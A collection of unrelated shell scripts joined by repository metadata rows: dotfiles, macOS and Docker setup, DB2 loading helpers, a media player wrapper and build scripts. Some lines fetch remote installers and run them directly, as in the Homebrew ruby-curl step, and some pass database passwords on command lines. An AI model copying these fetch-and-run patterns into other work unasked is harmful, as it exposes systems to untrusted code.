ZSH=$HOME/.oh-my-zsh
# this makes vim works with cntr-s command
stty -ixon
# Warning: Failed to set locale category LC_COLLATE to en_CH.
#
export LC_ALL=en_US.UTF-8
export PYTHONPATH=${PYTHONPATH}:/Library/Python/3.8/site-packages
# Set name of the theme to load --- if set to "random", it will
# load a random theme each time oh-my-zsh is loaded, in which case,
# to know which specific one was loaded, run: echo $RANDOM_THEME
# See https://github.com/ohmyzsh/ohmyzsh/wiki/Themes
ZSH_THEME='spaceship'
plugins=(
git
zsh-syntax-highlighting
zsh-autosuggestions
)
source $ZSH/oh-my-zsh.sh
export DOT_FILES='~/GitHub/dot-files'
# zsh aliases
alias ll="ls -la"
alias zshc="vim $DOT_FILES/.zshrc"
alias vimc="vim $DOT_FILES/.vimrc"
alias zshs="source $DOT_FILES/.zshrc"
alias vims="source $DOT_FILES/.vimrc"
alias rmdir="rm -fr"
alias md='mkdir'
alias showusage="ps -Ar -o \"pid %cpu %mem user comm\""
# git aliases
alias ga="git add"
alias gctm="git commit -m"
alias gct="git commit"
alias gpush="git push"
alias gpull="git pull"
alias gs="git status"
alias gc="git clone"
alias gd="git diff"
alias gb="git branch"
alias gcout="git checkout"
# mysql
alias mysql="/usr/local/mysql/bin/mysql -u root -p"
# alias ohmyzsh="mate ~/.oh-my-zsh"
# programming aliases
alias c="clang++ -std=c++17 -o app"
prompt_context(){}
| true
|
5cd0afeae64855a90b02e8b1f6b1b5a56f488414
|
Shell
|
Swifree/init-script
|
/init-mac.sh
|
UTF-8
| 1,896
| 3.25
| 3
|
[] |
no_license
|
# 当配置不存在时添加配置到~/.bash_profile
addConfigIFNX()
{
echo $1
f=~/.bash_profile
touch $f
if [ $(fgrep -c $1 $f) -eq 0 ]
then
echo $1 >> $f
fi
#配置立即生效
source $f
}
# 判断函数是否存在
notFound()
{
type $1 | grep -c 'not found'
}
# 安装homebrew
if [ $(notFound brew) -gt 0 ]
then
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
brew tap caskroom/versions
fi
# 禁止brew自动更新,不然brew install会先执行brew update,由于众所周知的原因,无法科学上网,导致brew install卡在brew updating上
addConfigIFNX 'export HOMEBREW_NO_AUTO_UPDATE=true'
# 安装vscode并且添加命令code,可以使用code path 命令使用vscode打开文件或文件夹
brew cask install visual-studio-code &
# 如果没安装go,安装go
if [ $(notFound go) -gt 0 ]
then
brew install go
addConfigIFNX 'export GOPATH=~/go'
fi &
# terminal的SF Mono字体挺好看的,复制到系统字体库,iterm2也可以用这个字体了
cp -R /Applications/Utilities/Terminal.app/Contents/Resources/Fonts/. /Library/Fonts/
# 如果没安装zsh, 安装zsh
if [ $(notFound zsh) -gt 0 ]
then
brew install zsh;
echo '. ~/.bash_profile' >> ~/.zshrc
fi &
# 安装完iterm2后进入Profiles -> Colors -> Color Presets选择Tango Dark
# 然后进入Profiles -> Window -> Transparency调到50%左右,可好看了,colomns:170,rows:100
# Profiles -> Text 12pt SF Mono Semibold, Keys-> hotkey设置唤起iterm的快捷键,我一般用cmd + option + t
brew cask install iterm2 &
brew cask install java8
addConfigIFNX 'export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_172.jdk/Contents/Home'
if [ $(notFound mvn) -gt 0 ]
then
brew install maven
fi &
brew cask install google-chrome &
brew cask install shadowsocksx-ng &
| true
|
c6f098e5d6a2c3ca403c4f23dd3d59aa7f63acef
|
Shell
|
DANS-KNAW/easy-bag-store
|
/src/main/assembly/dist/bin/send-bag-store-report.sh
|
UTF-8
| 1,549
| 4.28125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Helper script to create and send a list of all DOIs stored in a given bag-store
#
# Usage: ./send-archived-datasets-report.sh <bag-store> <from-email> <to-email> [<bcc-email>]
#
BAGSTORES_BASEDIR=$1
DARK_HOST=$2
BAGSTORE=$3
FROM=$4
TO=$5
BCC=$6
TMPDIR=/tmp
DATE=$(date +%Y-%m-%d)
REPORT=$TMPDIR/$BAGSTORE-dois-$DATE.csv
if [ "$FROM" == "" ]; then
FROM_EMAIl=""
else
FROM_EMAIL="-r $FROM"
fi
if [ "$BCC" == "" ]; then
BCC_EMAILS=""
else
BCC_EMAILS="-b $BCC"
fi
TO_EMAILS="$TO"
exit_if_failed() {
local EXITSTATUS=$?
if [ $EXITSTATUS != 0 ]; then
echo "ERROR: $1, exit status = $EXITSTATUS"
echo "Report generation FAILED. Contact the system administrator." |
mail -s "FAILED: Report: DOIs of datasets archived in bag-store $BAGSTORE" \
$FROM_EMAIL $BCC_EMAILS $TO
exit 1
fi
echo "OK"
}
echo -n "Creating list of DOIs in bag-store $BAGSTORE..."
find $BAGSTORES_BASEDIR/$BAGSTORE/ -name 'dataset.xml' | xargs cat | grep 'id-type:DOI' | sed -r 's/^.*>(.*)<.*$/\1/' > $REPORT
exit_if_failed "DOI list creation failed"
echo -n "Getting total disk usage of bag-store $BAGSTORE..."
DISK_USAGE=$(du -cbsh $BAGSTORES_BASEDIR/$BAGSTORE)
exit_if_failed "disk space usage report failed"
echo -n "Sending e-mail..."
echo -e "bag-store: $BAGSTORE\ndisk usage: $DISK_USAGE\nDOI list: see attached file" | \
mail -s "$DARK_HOST Report: status of bag-store: $BAGSTORE" -a $REPORT $BCC_EMAILS $FROM_EMAIL $TO_EMAILS
exit_if_failed "sending of e-mail failed"
| true
|
099dcf90786ab6d27a452477001cd18f13ae756d
|
Shell
|
wase90168/docker-lecture
|
/solution/install.sh
|
UTF-8
| 927
| 3.3125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
# Install updates
apt-get update
apt-get upgrade -y
# Adding some empty lines for readability
echo ""; echo ""; echo ""
# Install Docker
apt-get update
apt-get install apt-transport-https ca-certificates curl software-properties-common python-pip python-setuptools -y
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get install docker-ce -y
# Installing docker-compose
pip install wheel
pip install docker-compose
# Adding some empty lines for readability
echo ""; echo ""; echo ""
# Installing the environment and downloading all necessary files
echo "Installing environment..."
mkdir /opt/sysad/
cd /opt/sysad/
git clone https://github.com/wase90168/docker-lecture.git
| true
|
bdf56807b0d21b8cb120e4a909dcb3cc2a16fe54
|
Shell
|
thanethomson/lifetracker-iter3
|
/scripts/run-compose.sh
|
UTF-8
| 459
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
if [ -z "$1" ] || [ -z "$2" ]; then
echo "Usage: ./run-compose.sh <lifetracker_db_password> <postgres_password> [optional_compose_cmd]"
exit 1
fi
if [ -z "${IMAGE_TAG}" ]; then
export IMAGE_TAG="0.1.0-stretch"
fi
if [ -z "$3" ]; then
export COMPOSE_CMD=up
else
export COMPOSE_CMD=$3
fi
IMAGE_TAG=${IMAGE_TAG} \
LIFETRACKER_DATABASE_PASSWORD=$1 \
POSTGRES_PASSWORD=$2 \
docker-compose \
$COMPOSE_CMD
| true
|
e712f17c0243e14a970663dd8220a0b5e632a7c6
|
Shell
|
velentr/shellscripts
|
/doccount.sh
|
UTF-8
| 356
| 3.0625
| 3
|
[
"LicenseRef-scancode-other-permissive",
"MIT"
] |
permissive
|
#!/bin/sh
count=0
for f in *.pdf; do
count=`expr $count + $(pdfinfo "$f" 2> /dev/null | grep -a -e Pages | awk '{ print $2 }')`
done
for f in *.djvu; do
count=`expr $count + $(echo "n" | djvused "$f")`
done
for f in *.ps; do
count=`expr $count + $(psselect -p_1 $f 2>&1 >/dev/null | cut -f1 -d' ' | sed 's/\[//;s/\]//')`
done
echo $count
| true
|
f18cf2f5cf56c51c37b22f2e6cda65c4090fbddc
|
Shell
|
sylarLiu/Linux-Xenomai
|
/linux-3.18.20_xenomai-2.6.5/scripts/install_orocostoolchain2.9_onxenomai.sh
|
UTF-8
| 1,547
| 3.359375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
#==============================================================================
# Copyright (C) 2018 . All rights reserved.
#
# File Name : install_orocostoolchain2.9_onxenomai.sh
# Author : sylar.liu
# E-mail : sylar_liu65@163.com
# Created Time : 2018/11/12 21:06:29
# Description : This script is used to build orocos-toolchain on xenomai
#
#==============================================================================
OROCOS_INSTALL_PREFIX="/opt/orocos-2.9"
ROS_INSTALL_PREFIX="/opt/ros/kinetic"
ROS_DISTRO="kinetic"
user=`whoami`
if [ $user != "root" ]; then
echo -e "You have to execute the script with sudo."
exit 1
fi
# import Xenomai environment
source ~/.xenomai_rc
# Compile for Xenomai
export OROCOS_TARGET=xenomai
mkdir -p $OROCOS_INSTALL_PREFIX/src
cd $OROCOS_INSTALL_PREFIX/src
# Get all the packages
wstool init
wstool merge https://raw.githubusercontent.com/kuka-isir/rtt_lwr/rtt_lwr-2.0/lwr_utils/config/orocos_toolchain-2.9.rosinstall
wstool update -j$(nproc)
# Get the latest updates (OPTIONAL)
cd orocos_toolchain
git submodule foreach git checkout toolchain-2.9
git submodule foreach git pull
cd $OROCOS_INSTALL_PREFIX
# Install dependencies
source $ROS_INSTALL_PREFIX/setup.bash
rosdep install --from-paths $OROCOS_INSTALL_PREFIX/src --ignore-src --rosdistro $ROS_DISTRO -y -r
catkin config --init --install --extend $ROS_INSTALL_PREFIX --cmake-args -DCMAKE_BUILD_TYPE=Release -DENABLE_MQ=ON -DENABLE_CORBA=ON -DCORBA_IMPLEMENTATION=OMNIORB
catkin build
| true
|
5ff710630da2dbe92d188e8186c8493d70e918ee
|
Shell
|
wslab/kubes
|
/snoop-servlet/build.sh
|
UTF-8
| 361
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
REPO=localhost:32000
LABEL=dev
echo building image, tag: ${REPO}/snoop:${LABEL}
docker build -t ${REPO}/snoop:${LABEL} .
if [ $? -ne 0 ]
then
echo docker build error, stop.
return
fi
echo publishing to ${REPO}/snoop:${LABEL}
docker push ${REPO}/snoop:${LABEL}
if [ $? -ne 0 ]
then
echo docker publish error, stop.
return
fi
echo Done.
| true
|
8132313f83c92d1162289203e65690f68500ed4e
|
Shell
|
sdothum/dotfiles
|
/bin/bin/functions/media/play
|
UTF-8
| 3,990
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/dash
# sdothum - 2016 (c) wtfpl
# Media
# ══════════════════════════════════════════════════════════════════════════════
# ................................................................. Media player
# Usage: play <url> | [-q] <path> [<title>]
#
# Note: <path> may be a media file or folder containing such
fontsize=36
ext='avi|Avi|divx|Divx|m4v|M4v|mkv|Mkv|mp4|Mp4|wmv|Wmv'
delay=1 # for "next" xdotool key sequence
pgrep -f 'dmenu series' && next='next\n'
YOUTUBE=/net/downloads/http/youtube-dl
# cleanup accidental screenshots and youtube-dl
trap "rm -f $HOME/mpv-shot*.jpg" EXIT
[ "$1" = '-q' ] && { quiet=true; shift; }
# play media (see rox, dmenu movies, dmenu series, browsers..)
[ "$2" ] && title=$2 || title=${1##*/}
if cpu arm ;then
# youtube playback on raspberry pi architecture is unsupported
if echo $1 | grep -q http ;then
rm -f $YOUTUBE*
# leverage cpu power of network server for download and media conversion
term youtube-dl FLOAT SHELL "ditto youtube-dl "$1" && ssh $SERVER youtube-dl -o $YOUTUBE "$1""
pwait "$YOUTUBE"
title=$YOUTUBE
STREAM=$(find ${YOUTUBE%/youtube-dl} -name 'youtube-dl*')
if [ ${STREAM##*.} = webm ] ;then
term youtube-dl FLOAT SHELL "ditto youtube-dl "$1" && ssh $SERVER ffmpeg -y -i "$STREAM" "${STREAM%.*}.mp4""
ssh $SERVER ffmpeg -i "$STREAM" "${STREAM%.*}.mp4"
pwait "${STREAM%.*}.mp4"
STREAM="${STREAM%.*}.mp4"
fi
fi
geometry=$(dmenu geometry "$title") || exit
fi
# check for attached usb drive
if [ -z $STREAM ] ;then
[ -d "$1" ] && path=$1 || path=${1%/*}
# attached usb drive?
libext=$(find /run/media/$USER -maxdepth 3 -type d -name "$(basename $(dirname "$path"))" 2>/dev/null)
if [ -n "$libext" ] ;then
STREAM=$(find "$libext" -maxdepth 1 -type d -name "${path##*/}")
STREAM=$(find "$STREAM" -regextype posix-extended -regex ".*($ext)" | grep -v sample)
else
STREAM=$1
fi
fi
videomode on
while : ;do
if cpu arm ;then
notify 0 blackboard "$title" '1/2 Speed\n+/- Volume\nj/k Language\nm/n Subtitles\ns Toggle'
# syncthing cpu usage can exacerbate video stuttering
# sv stop syncthing@$USER
# omxplayer keyboard shortcuts only available through terminal emulator
# eval term 'omxplay' BLACKBOARD omxplayer $geometry --subtitles "${STREAM%.*}.srt" --align center "$STREAM"
# media filenames with embedded blanks are messy to handle, use symbolic link instead!
ln -sf "$STREAM" /tmp/play:link
eval term 'omxplay' BLACKBOARD omxplayer $geometry --align center /tmp/play:link
echo "$title -> $STREAM" >>/tmp/omxplay.log
# accomodate arm term omxplayer lag time variance
sleep 1
pwait /tmp/play:link
# sv start syncthing@$USER
# clear notification
xdotool key Ctrl+space
touch $MENU
else
notify 0 blackboard "$title" "$(printf '1/2^Contrast\n3/4^Brightness\n5/6^Gamma\n7/8^Saturation\n9/0^Volume^m^Mute\n-/+^Audio Delay^ #^Language\nj/J^Subtitles^ v^Toggle\nx/z^Subtitle Delay' | column -s^ -t)"
focus frame
mpv --vf=eq "$STREAM" --sub-font-size=$fontsize >/dev/null 2>&1 &
# clear notification
pwait "mpv --vf=eq"
xdotool key Ctrl+space
fi
echo "$1" | grep -q http && break
[ $quiet ] && break
# only purges server files (arm redirected usb files remain untouched)
action=$(echo "${next}quit\nskip\nreplay\ndelete\nsonarr" | rmenu "$title" -no-custom)
case $action in
delete)
[ "$(echo 'no\nyes' | rmenu "Delete $title" -no-custom)" = yes ] || break
mhistory play:delete "$title $1"
rm -rf "$1"
break ;;
next )
(sleep $delay; xdotool key Down; xdotool key Return;) & # key presses for episodes menu
break ;;
quit ) pkill -f 'dmenu'; blackboard; videomode off; exit ;; # restore dynamic windows
replay) pulse; continue ;;
sonarr) sonarr $STREAM; break ;;
* ) break ;;
esac
done
videomode off
# vim: set ft=sh: #
| true
|
58956858521706fc064339a4f1ce925eff291d05
|
Shell
|
da99/da_spec
|
/sh/test
|
UTF-8
| 196
| 2.625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
#
#
set -u -e -o pipefail
local +x THIS_DIR="$( dirname "$(realpath "$0")" )/.."
cd "$THIS_DIR"
sh/build
set -x
find dist/spec/ -type f -name "*.spec.mjs" | xargs -I F node F
| true
|
764825b1bd6262f3c0521a864212d3daf610d51f
|
Shell
|
rachelmccown/hangman-secureci-tester-max
|
/coveros_opensource_ci_cd-master/hangmaninstaller/signed.sh
|
UTF-8
| 643
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
set -x
SIGNED=""
while [ -z "$SIGNED" ] ; do SIGNED=`curl -k -H "Accept: pson" https://puppetmaster.demo.secureci.com:8140/production/certificate_status/$1 | grep signed` ; echo checking tomcat - Exists:$1; sleep 5; done
FACTS=""
while [ -z "$FACTS" ] ; do FACTS=`curl -k -H "Accept: yaml" https://puppetmaster.demo.secureci.com:8140/production/facts/$1 | grep ipaddress:` ; echo checking tomcat:$1 - intip; sleep 5; done
FACTS=""
while [ -z "$FACTS" ] ; do FACTS=`curl -k -H "Accept: yaml" https://puppetmaster.demo.secureci.com:8140/production/facts/$1 | grep ec2_public_ipv4:` ; echo checking tomcat:$1 - extip; sleep 5; done
| true
|
89309968c0a0d2d4904af3c5fa1d8c62b32e05b2
|
Shell
|
stanislawbartkowski/mytpcds
|
/proc/db2commonproc.sh
|
UTF-8
| 3,720
| 3.671875
| 4
|
[
"Apache-2.0"
] |
permissive
|
# -----------------------------------
# my db2 command shell functions
# version 1.00
# 2021/11/11
# 2021/12/02 - added set -x w at the beginning
# 2021/12/12 - change in loadserver
# 2021/12/18 - db2clirun, timeout detection
# 2021/12/16 - db2clirun, load messages
# -----------------------------------
#set -x
#w
db2clirun() {
required_var DBPASSWORD
local -r CONNECTION="DATABASE=$DBNAME;HOSTNAME=$DBHOST;PORT=$DBPORT;UID=$DBUSER;PWD=$DBPASSWORD"
local -r sqlinput=$1
local -r ITEMP=`crtemp`
local -r OTEMP=`crtemp`
[ -n "$SCHEMA" ] && echo "SET CURRENT SCHEMA $SCHEMA ;" >$ITEMP
cat $1 >>$ITEMP
$QUERYTIMEOUT db2cli execsql -statementdelimiter ";" -connstring "$CONNECTION" -inputsql $ITEMP -outfile $OTEMP
[ $? -eq 124 ] && return 124
# timeout
local RES=0
if grep "ErrorMsg" $OTEMP; then
logfile $OTEMP
log "Error found while executing the query, check logs"
RES=8
fi
cat $OTEMP
return $RES
}
##################################################
# DB2 load delimited file from server location
# important: text file delimited by |
# Arguments:
# $1 - table to load
# $2 - server location of delimited file
#######################################
db2loadfileserver() {
local -r TABLENAME=$1
local -r INLOADFILE=$2
local -r TMPS=`crtemp`
local -t MESSFILE=/tmp/$TABLENAME.txt
# local -r SFILE=`serverfile $INLOADFILE`
cat << EOF > $TMPS
CALL SYSPROC.ADMIN_CMD('load from $INLOADFILE of del modified by coldel$COLDEL MESSAGES ON SERVER replace into $TABLENAME NONRECOVERABLE');
EOF
db2clirun $TMPS
}
serverfile() {
local -r tbl=`basename $1`
echo "$PREFIXSERVER/$tbl"
}
##################################################
# DB2 load delimited file from S3 bucker
# important: text file delimited by |
#
# GLOBALS:
# PREFIXSERVER: root directory in S3 bucket, prefix to $2
# ENDPOINT: S3 endpoint
# AWSKEY: AWS key
# AWSSECRETKEY: AWS secret key
# BUCKET: AWS secret
# Arguments:
# $1 - table to load
# $2 - location in S3 bucket of file to load
#####################################################
db2loadfiles3() {
local -r TABLENAME=$1
local -r INLOADFILE=$2
local -r TMPS=`crtemp`
required_listofvars PREFIXSERVER ENDPOINT AWSKEY AWSSECRETKEY BUCKET
local -r S3FILE=`serverfile $INLOADFILE`
log "Loading from $S3FILE S3/AWS file"
cat << EOF > $TMPS
CALL SYSPROC.ADMIN_CMD('LOAD FROM S3::$ENDPOINT::$AWSKEY::$AWSSECRETKEY::$BUCKET::$S3FILE OF DEL modified by coldel$COLDEL REPLACE INTO $TABLENAME NONRECOVERABLE');
EOF
db2clirun $TMPS
# jdbcqueryupdatefile $TMPS
}
db2connect() {
required_command db2
required_var DBNAME DBUSER DBPASSWORD
log "Connecting to $DBNAME user $DBUSER"
db2 connect to $DBNAME user $DBUSER using $DBPASSWORD
[ $? -ne 0 ] && logfail "Cannot connect to $DBNAME"
[[ -z $SCHEMA ]] && return 0
log "Set schema $SCHEMA after connection"
[[ -n $SCHEMA ]] && db2 "set current schema $SCHEMA"
[ $? -ne 0 ] && logfail "Cannot set schema $SCHEMA"
}
db2terminate() {
db2 terminate
}
db2runscript() {
local -r f=$1
db2 -x -tsf $f
[ $? -ne 0 ] && logfail "Failed running $f"
}
db2exportcommand() {
required_var DELIM
local -r output=$1
shift
echo $@
db2 EXPORT TO $output OF DEL MODIFIED BY NOCHARDEL COLDEL$DELIM $@
[ $? -ne 0 ] && logfail "Failed while export the statement"
}
db2loadblobs() {
local -r IMPFILE=$1
local -r IMPBLOBDIR=$2
local -r IMPTABLE=$3
log "Load $IMPTABLE table from server $IMPFILE using blobs in $IMPBLOBDIR"
db2 "LOAD FROM $IMPFILE OF DEL LOBS FROM $IMPBLOBDIR MODIFIED BY COLDEL$COLDEL REPLACE INTO $IMPTABLE"
[ $? -ne 0 ] && logfail "Load failed"
}
| true
|
b18b73c74bbffe0bd018a8c6a94bc83429ec511a
|
Shell
|
eabyshev/base
|
/big-data/nutch/nutch/DEBIAN/postinst
|
UTF-8
| 378
| 3.578125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
FilePath="/etc/profile"
. $FilePath
nutchVersion=1.4.4
nutchHome="/opt/nutch-$nutchVersion"
nutchConf="/etc/nutch"
if [[ "x$NUTCH_HOME" != "x" ]];
then
nutchHome=$NUTCH_HOME
fi
if [[ "x$NUTCH_CONF_DIR" != "x" ]];
then
nutchConf=$NUTCH_CONF_DIR
fi
# Create symlink to configuration files and scripts
ln -sf $nutchConf/* $nutchHome/conf/
| true
|
8eccfd5123e0266005d61f1ffe10a440531e3680
|
Shell
|
andersonledo/ironman
|
/templates/remember-next-events.sh
|
UTF-8
| 267
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#paramenters
EVENTOS_PROJETO=$1
RODAPE=$2
#template
cat << EOF
Subject: [$NOME_PROJETO - $FASE_PROJETO] Próximos eventos
Pessoal,
Lembrando que nos próximos dias temos os seguintes eventos:
$EVENTOS_PROJETO
Agendem-se.
Atenciosamente,
$RODAPE
EOF
| true
|
05f203aa5ae9504f0689731f5fc0b656ae5777b8
|
Shell
|
kevindang88/edu
|
/cs260/assignment-3/s5.ksh
|
UTF-8
| 277
| 3.296875
| 3
|
[] |
no_license
|
# Same as Bourne shell
echo -e "Enter a color: \c"
read color
case $color in
bl*|Bl*)
echo "The sky color is $color."
;;
red|yellow)
echo "The sun is sometimes this color."
;;
*)
echo "That color is not in any of the categories defined."
;;
esac
| true
|
805542122df8355dea32fd31317b7af48a506484
|
Shell
|
qzchenwl/utils
|
/scripts/bin/wireless-setup
|
UTF-8
| 183
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash
if [ -z "$1"]
echo "Usage: $0 ESSID"
fi
sudo ifconfig wlan0 up
sudo iwconfig wlan0 txpower on
sudo iwconfig wlan0 essid "$1" # key s:password [1]
sudo dhclient wlan0
| true
|
e9c1cb3b0ff3d7484be64a730d6a0a855b78a5f9
|
Shell
|
art200109/project
|
/flask/flask_user/useradd.sh
|
UTF-8
| 396
| 2.5625
| 3
|
[] |
no_license
|
#! /bin/bash
cp -n /bin/bash /bin/rbash
mkdir -p ./flask_user/programs
ln -s /usr/bin/docker ./flask_user/programs/
cp ./.bash_profile ./flask_user
mkdir ./flask_user/.ssh
cp ./.ssh/docker_key.pub ./flask_user/.ssh/authorized_keys
userdel -r flask_user > /dev/null
useradd -s /bin/rbash -G docker flask_user
cp -rf ./flask_user /home/
chown -R flask_user /home/flask_user
rm -rf ./flask_user
| true
|
95900fd4254b1513f0f8437e772c07990cbac39f
|
Shell
|
jtwray/solana
|
/ci/test-bench.sh
|
UTF-8
| 740
| 3.125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -e
cd "$(dirname "$0")/.."
# shellcheck disable=SC1091
source ci/upload_ci_artifact.sh
eval "$(ci/channel-info.sh)"
ci/version-check.sh nightly
export RUST_BACKTRACE=1
_() {
echo "--- $*"
"$@"
}
set -o pipefail
UPLOAD_METRICS=""
TARGET_BRANCH=$BUILDKITE_BRANCH
if [[ -z $BUILDKITE_BRANCH ]] || ./ci/is-pr.sh; then
TARGET_BRANCH=$EDGE_CHANNEL
else
UPLOAD_METRICS="upload"
fi
BENCH_FILE=bench_output.log
BENCH_ARTIFACT=current_bench_results.log
_ cargo bench --features=unstable --verbose -- -Z unstable-options --format=json | tee "$BENCH_FILE"
_ cargo run --release --bin solana-upload-perf -- "$BENCH_FILE" "$TARGET_BRANCH" "$UPLOAD_METRICS" >"$BENCH_ARTIFACT"
upload_ci_artifact "$BENCH_ARTIFACT"
| true
|
c2b84fce4658fca128371b27e4d65f9df57c5551
|
Shell
|
xaverh/bootstrap-scripts
|
/stage3/root.sh
|
UTF-8
| 1,741
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/true
set -e
. $(dirname $(realpath -s $0))/common.sh
printInfo "Configuring root filesystem layout"
install -v -D -d -m 00755 "${SERPENT_INSTALL_DIR}"/usr/{bin,lib,share,sbin,include}
install -v -D -d -m 00755 "${SERPENT_INSTALL_DIR}"/{etc,proc,run,var,sys,dev,tmp}
install -v -D -d -m 00755 "${SERPENT_INSTALL_DIR}/run/lock"
ln -sv ../run/lock "${SERPENT_INSTALL_DIR}/var/lock"
ln -sv lib "${SERPENT_INSTALL_DIR}/usr/lib64"
ln -sv usr/bin "${SERPENT_INSTALL_DIR}/bin"
ln -sv usr/sbin "${SERPENT_INSTALL_DIR}/sbin"
ln -sv usr/lib "${SERPENT_INSTALL_DIR}/lib"
ln -sv usr/lib64 "${SERPENT_INSTALL_DIR}/lib64"
printInfo "Constructing device nodes"
# TTY support
mknod -m 622 "${SERPENT_INSTALL_DIR}"/dev/console c 5 1
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/ptmx c 5 2
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/tty c 5 0
chown -v root:tty "${SERPENT_INSTALL_DIR}"/dev/{console,ptmx,tty}
# Runtime support for random/null/zero
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/null c 1 3
mknod -m 666 "${SERPENT_INSTALL_DIR}"/dev/zero c 1 5
mknod -m 444 "${SERPENT_INSTALL_DIR}"/dev/random c 1 8
mknod -m 444 "${SERPENT_INSTALL_DIR}"/dev/urandom c 1 9
printInfo "Creating runtime device links"
# runtime support
ln -svf /proc/self/fd "${SERPENT_INSTALL_DIR}"/dev/fd
ln -svf /proc/self/fd/0 "${SERPENT_INSTALL_DIR}"/dev/stdin
ln -svf /proc/self/fd/1 "${SERPENT_INSTALL_DIR}"/dev/stdout
ln -svf /proc/self/fd/2 "${SERPENT_INSTALL_DIR}"/dev/stderr
ln -svf /proc/kcore "${SERPENT_INSTALL_DIR}"/dev/core
printInfo "Stashing /bin/sh compat link"
if [[ "${SERPENT_LIBC}" == "musl" ]]; then
ln -svf /serpent/usr/bin/dash "${SERPENT_INSTALL_DIR}/usr/bin/sh"
else
ln -sfv /serpent/usr/bin/bash "${SERPENT_INSTALL_DIR}/usr/bin/sh"
fi
| true
|
33be4c439308df7a04b99b4cede304eb96de9e9c
|
Shell
|
rmetcalf9/saas_user_management_system
|
/services/testContainer/testRunAppLocalDeveloperEndpoint.sh
|
UTF-8
| 736
| 2.8125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
echo "Only works on locally running container because /public/api and /public/web are not present"
if [[ "E${SAASCODEFRESHTESTUSERPASSWORD}" == "E" ]]; then
echo "You need to set SAASCODEFRESHTESTUSERPASSWORD to use this"
exit 1
fi
export HOSTIP=`ip -4 addr show scope global dev wlp2s0 | grep inet | awk '{print \$2}' | cut -d / -f 1`
docker run --rm --network main_net \
-e BASEURL_TO_TEST=http://${HOSTIP}:8098 \
-e APIAPP_DEFAULTHOMEADMINUSERNAME=admin \
-e APIAPP_DEFAULTHOMEADMINPASSWORD=admin \
-e EXPECTED_CONTAINER_VERSION=$(cat ../../VERSION) \
-e RUNNINGVIAKONG="TRUE" \
--mount type=bind,source=$(pwd),target=/ext_volume metcarob/saas_user_management_systemtest:latest python3 -m pytest /ext_volume
| true
|
dacbf6c842687cbe70008daed3fbb5d0bb6cfe40
|
Shell
|
rdisipio/MAMbo
|
/run/scripts_ttdiffxs_8TeV/submit_mc_particle_Alpgen.sh
|
UTF-8
| 944
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
analysis=tt_diffxs_8TeV
outtag=TTbarResolved_resolved
syst=particle
queue=T3_BO_LOCAL
[[ ${HOSTNAME} == *"cern.ch"* ]] && queue=1nh
alpgen_list=${PWD}/AlpgenPythia_ljets.dat
[ ! -z $1 ] && alpgen_list=$1
for ch in el mu
do
for dts in $(cat ${alpgen_list} | grep ":${ch}" | grep -v 'jjjj' | sort )
do
dsid=$(echo ${dts} | cut -d':' -f1)
hr=$(echo ${dts} | cut -d':' -f2)
# ch=$(echo ${dts} | cut -d':' -f3)
syst=$(echo ${hr} | cut -d'_' -f3)
[[ $syst == *"ttbar"* ]] && syst=nominal
params=${MAMBODIR}/share/control/analysis_params/${outtag}/mcparticle_${ch}.xml
filelist=${MAMBODIR}/share/control/file_list/${outtag}/mc.DiTop.${dsid}.mc.txt
tag=${analysis}.mc.DiTop.${dsid}.${ch}.${syst}.particle
outfile=particle/${tag}.histograms.root
jobname=${tag}
echo "Submitting ${jobname} output ${outfile}"
MAMbo-submit.sh -p ${params} -f ${filelist} -o ${outfile} -j ${jobname} -q ${queue}
done
done
| true
|
8f58229a0414fdabf201bc5e7b2af48962fbf8bc
|
Shell
|
Adrian-Rosoga/code_pi
|
/PiWebServer/pi_ws.service.install.sh
|
UTF-8
| 310
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
sudo cp /home/pi/code_pi/PiWebServer/pi_ws.service /etc/systemd/system
sudo systemctl daemon-reload
sudo systemctl start pi_ws.service
# Check status
sudo systemctl status pi_ws.service
echo "All seems ok, enabling the service now..."
sudo systemctl enable pi_ws.service
echo "Done!"
| true
|
02e9ea0c95bd5221d37072da173c05078dab04e2
|
Shell
|
mmurdoch/arduinounit
|
/examples/advanced/test-vitro
|
UTF-8
| 1,021
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# Figure out what to test
#
if [ $# -gt 0 ]; then
ARDUINO_TARGET_INO="$1"
else
ARDUINO_TARGET_INO="$(echo *.ino)"
fi
if [ ! -f "${ARDUINO_TARGET_INO}" ] ; then
echo "must specify ino file"
exit 1
fi
ARDUINO_TARGET_DIR="$(dirname "$ARDUINO_TARGET_INO")"
ARDUINO_TARGET_BASE="$(basename "$ARDUINO_TARGET_INO")"
ARDUINO_TARGET_FILE="${ARDUINO_TARGET_BASE%.ino}"
ARDUINO_TARGET_EXE="$ARDUINO_TARGET_DIR/$ARDUINO_TARGET_FILE"
/bin/rm -rf "${ARDUINO_TARGET_EXE}.log" "${ARDUINO_TARGET_EXE}.xml"
if [ ! -x "${ARDUINO_TARGET_EXE}" ] ; then
